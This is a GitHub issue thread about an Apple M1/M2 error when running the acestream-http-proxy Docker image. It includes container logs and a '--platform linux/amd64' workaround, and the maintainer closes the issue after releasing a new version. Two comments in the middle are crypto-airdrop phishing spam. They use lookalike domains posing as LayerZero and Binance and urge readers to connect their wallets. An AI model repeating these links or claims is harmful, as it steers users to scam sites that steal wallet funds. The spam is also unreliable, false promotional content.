### ISSUE TITLE
Installation on M1/M2 Mac workaround for "/lib64/ld-linux-x86-64.so.2: No such file or directory"

### ISSUE THREAD

**Issue by vaughey** [martinbjeldbak/acestream-http-proxy#5]
Installation on a running Docker instance on a M2 Mac completed successfully but refused to run.

Used the documented "docker run -t -p 6878:6878 ghcr.io/martinbjeldbak/acestream-http-proxy".

Docker terminal throwing an error message: "/lib64/ld-linux-x86-64.so.2: No such file or directory"

Googled and found a related scenario at https://stackoverflow.com/questions/68630526/lib64-ld-linux-x86-64-so-2-no-such-file-or-directory-error in the comments.

Paraphrasing poorly - Mac M1/M2 are native Arm environments and Docker gets confused running Arm containers.

Deleting the container and reinstalling adding the "--platform linux/x86_64" resolves the error. Command as follows:

"docker run -t -p 6878:6878 --platform linux/x86_64 ghcr.io/martinbjeldbak/acestream-http-proxy"

Still won't run. Log file:

2023-03-04 12:54:59 2023-03-04 17:54:59,598|MainThread|acestream|init segmenter done: log_path=/root/.ACEStream/logs/segmenter.log
2023-03-04 12:54:59 2023-03-04 17:54:59,601|MainThread|acestream|Start Ace Stream 3.1.75rc4
2023-03-04 12:54:59 2023-03-04 17:54:59,601|MainThread|acestream|platform=linux
2023-03-04 12:54:59 2023-03-04 17:54:59,602|MainThread|acestream|app=acestream
2023-03-04 12:54:59 2023-03-04 17:54:59,602|MainThread|acestream|version=3.1.75rc4 code=3017500 revision=d7429ec date=2022-10-19
2023-03-04 12:54:59 2023-03-04 17:54:59,603|MainThread|acestream|use_local_db=True
2023-03-04 12:54:59 2023-03-04 17:54:59,603|MainThread|acestream|use_m2crypto=False
2023-03-04 12:54:59 2023-03-04 17:54:59,604|MainThread|acestream|is_gui_mode=0
2023-03-04 12:54:59 2023-03-04 17:54:59,605|MainThread|acestream|user_agent=Mozilla/5.0 (Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36 AceStream/3.1.75rc4
2023-03-04 12:54:59 2023-03-04 17:54:59,606|MainThread|acestream|python_version=3.8.0-final-0
2023-03-04 12:54:59 2023-03-04 17:54:59,606|MainThread|acestream|enable debug: 0
2023-03-04 12:54:59 2023-03-04 17:54:59,608|MainThread|acestream|set debug level: 0
2023-03-04 12:54:59 2023-03-04 17:54:59,631|MainThread|acestream.coreapp|pid=14
2023-03-04 12:54:59 2023-03-04 17:54:59,632|MainThread|acestream.coreapp|process monitor initialized
2023-03-04 12:54:59 2023-03-04 17:54:59,636|MainThread|acestream|get_default_api_version: 2
2023-03-04 12:54:59 2023-03-04 17:54:59,637|MainThread|acestream.coreapp|use fixed i2i_port: 62062
2023-03-04 12:54:59 2023-03-04 17:54:59,637|MainThread|acestream.coreapp|state_dir='/root/.ACEStream'
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:54:59 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 ls: cannot access '/dev/disk/by-id/': No such file or directory
2023-03-04 12:55:00 2023-03-04 17:55:00,965|MainThread|acestream.coreapp|set_debug_from_ui: level=0
2023-03-04 12:55:00 2023-03-04 17:55:00,969|MainThread|acestream|enable debug: 0
2023-03-04 12:55:00 2023-03-04 17:55:00,970|MainThread|acestream|set debug level: 0
2023-03-04 12:55:01 2023-03-04 17:55:01,024|MainThread|acestream.coreapp|cannot load session config, use default
2023-03-04 12:55:01 2023-03-04 17:55:01,211|MainThread|acestream.SocketHandler.InterruptSocket|bound on 127.0.0.1:59873
2023-03-04 12:55:01 2023-03-04 17:55:01,213|MainThread|acestream.SocketHandler.SocketHandler|bind: socket bound: host=0.0.0.0 port=8621
2023-03-04 12:55:01 2023-03-04 17:55:01,213|MainThread|acestream.LM|listen on 8621
2023-03-04 12:55:01 2023-03-04 17:55:01,214|MainThread|acestream.localdb|No existing database found. Attempting to creating a new database '/root/.ACEStream/sqlite/torrentstream.sdb'
2023-03-04 12:55:01 2023-03-04 17:55:01,278|AceStreamCoreThread|acestream.SocketHandler.SocketHandler|create_multicast_sockets: failed to create socket: ip=239.255.17.18 port=32968 local=172.17.0.5: <class 'OSError'>:[Errno 92] Protocol not available
2023-03-04 12:55:01 2023-03-04 17:55:01,319|MainThread|acestream.VideoServer|start: addr= port=6878 allow_remote=0 allow_intranet=1
2023-03-04 12:55:01 2023-03-04 17:55:01,457|MainThread|acestream.coreapp|failed to start aircast manager
2023-03-04 12:55:01 Traceback (most recent call last):
2023-03-04 12:55:01   File "core/src/CoreApp.pyx", line 1569, in 
2023-03-04 12:55:01   File "core/src/AirCast/AirCastManager.pyx", line 158, in 
2023-03-04 12:55:01   File "core/src/AirCast/DiscoveryManager.pyx", line 300, in 
2023-03-04 12:55:01   File "ACEStream/third_party/zeroconf/zeroconf.py", line 1405, in __init__
2023-03-04 12:55:01   File "ACEStream/third_party/zeroconf/zeroconf.py", line 1441, in _init_sockets
2023-03-04 12:55:01 OSError: [Errno 92] Protocol not available
2023-03-04 12:55:01 2023-03-04 17:55:01,532|MainThread|acestream.SocketHandler.InterruptSocket|bound on 127.0.0.1:39490
2023-03-04 12:55:01 2023-03-04 17:55:01,533|MainThread|acestream.SocketHandler.SocketHandler|bind: socket bound: host=0.0.0.0 port=62062
2023-03-04 12:55:01 2023-03-04 17:55:01,539|Instance2InstanceThread-30|acestream.APIServer|run: ready to receive remote commands on 62062
2023-03-04 12:55:01 2023-03-04 17:55:01,542|PlaylistTaskManagerThread-31|acestream.TaskManager|started
2023-03-04 12:55:03 2023-03-04 17:55:03,086|ProxyServerTaskQueueThread-3|acestream.streamlink|check_plugin_signature: error
2023-03-04 12:55:03 Traceback (most recent call last):
2023-03-04 12:55:03   File "ACEStream/PluginsContainer/streamlink/session.py", line 531, in check_plugin_signature
2023-03-04 12:55:03   File "/usr/lib/python3.8/encodings/ascii.py", line 26, in decode
2023-03-04 12:55:03     return codecs.ascii_decode(input, self.errors)[0]
2023-03-04 12:55:03 UnicodeDecodeError: 'ascii' codec can't decode byte 0xc4 in position 769: ordinal not in range(128)
2023-03-04 12:55:05 2023-03-04 17:55:05,104|ProxyServerTaskQueueThread-3|acestream.streamlink|check_plugin_signature: error
2023-03-04 12:55:05 Traceback (most recent call last):
2023-03-04 12:55:05   File "ACEStream/PluginsContainer/streamlink/session.py", line 531, in check_plugin_signature
2023-03-04 12:55:05   File "/usr/lib/python3.8/encodings/ascii.py", line 26, in decode
2023-03-04 12:55:05     return codecs.ascii_decode(input, self.errors)[0]
2023-03-04 12:55:05 UnicodeDecodeError: 'ascii' codec can't decode byte 0xe3 in position 1834: ordinal not in range(128)

**Comment by martinbjeldbak** [comment]
Hi @vaughey thanks for logging this! I'll try and get an arm based macbook to replicate.

I'm curious - I get similar logs as above when running my container locally, but it still works. Is the container still up at the last log line or does it crash? If it it's up, can you try connecting to an acestream stream?

**Comment by vaughey** [comment]
M-

Container is “up” but non-responsive HTTP API

PV

On Mar 7, 2023, at 5:57 AM, Martin Bjeldbak Madsen ***@***.***> wrote:



Hi @vaughey<https://github.com/vaughey> thanks for logging this! I'll try and get an arm based macbook to replicate.

I'm curious - I get similar logs as above when running my container locally, but it still works. Is the container still up at the last log line or does it crash? If it it's up, can you try connecting to an acestream stream?

**Comment by 2m** [comment]
I used the provided workaround and have it working on my M2 machine.
```
docker run --platform=linux/amd64 -t -p 6878:6878 ghcr.io/martinbjeldbak/acestream-http-proxy
```

**Comment by santhosh-trillionthoughts** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/0*OZiVjlR298BNDURV.png)

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @erichstrange, @enkhee-Osiris, @ABOLFAZLVALIKHANI, @VinayKadalagi, @filipeoliveiraa, @sguzman, @puchp

**Comment by martinbjeldbak** [comment]
Awesome thank you for the update @2m this must be because of Rosetta emulation

@vaughey please try updating to the latest version that I just released [v2.1.0](https://github.com/martinbjeldbak/acestream-http-proxy/releases/tag/v2.1.0) which bumps AceStream along with @2m's suggestion that may fix your issues

Please post here if any updates, closing for now and will reopen if still having troubles

**Comment by vaughey** [comment]
M-

Appreciate the follow-up.

@2m’s suggestion is my quoted work-around that I included in my the original  ticket as a FYI.

I’ve had it working for a while.

I’ll try the upgrade at some point.

P



On Jun 8, 2024, at 9:29 AM, Martin Bjeldbak Madsen ***@***.***> wrote:

You don't often get email from ***@***.*** Learn why this is important<https://aka.ms/LearnAboutSenderIdentification>


Closed #5<https://github.com/martinbjeldbak/acestream-http-proxy/issues/5> as completed.
